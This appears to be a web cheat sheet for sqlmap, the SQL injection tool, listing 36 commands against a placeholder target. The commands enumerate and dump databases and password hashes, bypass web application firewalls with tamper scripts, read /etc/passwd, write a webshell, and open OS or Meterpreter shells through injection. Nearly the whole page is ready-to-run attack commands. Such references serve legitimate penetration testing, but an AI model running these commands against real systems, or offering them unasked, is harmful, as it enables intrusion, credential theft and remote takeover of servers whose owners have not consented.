SQLMap Injection Cheatsheet

Complete sqlmap reference for SQL injection enumeration, data extraction, file read/write, and OS shell access across all major databases. (36 payloads)

Basic Enumeration

(7)

sqlmap -u "http://target.com/page?id=1" --dbs

List all databases

sqlmap -u "http://target.com/page?id=1" -D dbname --tables

List tables in a specific database

sqlmap -u "http://target.com/page?id=1" -D dbname -T tablename --columns

List columns in a table

sqlmap -u "http://target.com/page?id=1" -D dbname -T tablename --dump

Dump entire table

sqlmap -u "http://target.com/page?id=1" -D dbname -T users -C username,password --dump

Dump specific columns

sqlmap -u "http://target.com/page?id=1" --current-db --current-user

Get current database and user

sqlmap -u "http://target.com/page?id=1" --passwords

Extract database user hashes

Request Options

(6)

sqlmap -u "http://target.com/login" --data="user=admin&pass=test" -p user

POST request with specific parameter

sqlmap -r request.txt

Use saved Burp Suite request file

sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abc123"

Include authentication cookie

sqlmap -u "http://target.com/page?id=1" -H "Authorization: Bearer eyJ..."

Add custom header

sqlmap -u "http://target.com/page?id=1*"

Specify injection point with * marker

sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"

Route through Burp Suite proxy

Technique & Detection

(6)

sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3

Maximum detection (level 1-5, risk 1-3) — more payloads, more aggressive

sqlmap -u "http://target.com/page?id=1" --technique=UNION

Only UNION-based injection

sqlmap -u "http://target.com/page?id=1" --technique=B

Only Boolean-based blind injection

sqlmap -u "http://target.com/page?id=1" --technique=T

Only Time-based blind injection

sqlmap -u "http://target.com/page?id=1" --dbms=mysql

Specify target DBMS (mysql/mssql/oracle/postgresql/sqlite)

sqlmap -u "http://target.com/page?id=1" --string="Welcome"

String to identify true condition in blind injection

WAF Bypass (Tamper Scripts)

(6)

sqlmap -u "URL" --tamper=space2comment

Replace spaces with /**/ comments

sqlmap -u "URL" --tamper=randomcase

Randomize keyword casing (SeLeCt, uNiOn)

sqlmap -u "URL" --tamper=between

Replace > with NOT BETWEEN 0 AND — WAF bypass

sqlmap -u "URL" --tamper=charencode

URL encode all characters

sqlmap -u "URL" --tamper=space2dash

Replace spaces with dash comment (-- )

sqlmap -u "URL" --tamper=space2comment,randomcase,between

Chain multiple tamper scripts

File & OS Access

(5)

sqlmap -u "URL" --file-read="/etc/passwd"

Read file from server (requires FILE privilege)

sqlmap -u "URL" --file-write=shell.php --file-dest=/var/www/html/shell.php

Write webshell to server

sqlmap -u "URL" --os-shell

Interactive OS shell via SQL injection

sqlmap -u "URL" --os-cmd="id"

Execute single OS command

sqlmap -u "URL" --os-pwn

Meterpreter/VNC shell via SQL injection

Automation & Output

(6)

sqlmap -u "URL" --batch

Non-interactive mode — use defaults for all prompts

sqlmap -u "URL" --dump-all --exclude-sysdbs

Dump all non-system databases

sqlmap -u "URL" --threads=10

Use 10 threads for faster enumeration

sqlmap -u "URL" --forms

Automatically detect and test HTML forms

sqlmap -u "URL" --crawl=3

Crawl 3 levels deep and test all found parameters

sqlmap -u "URL" --output-dir=/tmp/sqlmap_results

Save results to specific directory

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

SQL Injection

Related Cheat Sheets

XSS Cheat Sheet WAF Bypass Cheat Sheet

$loading...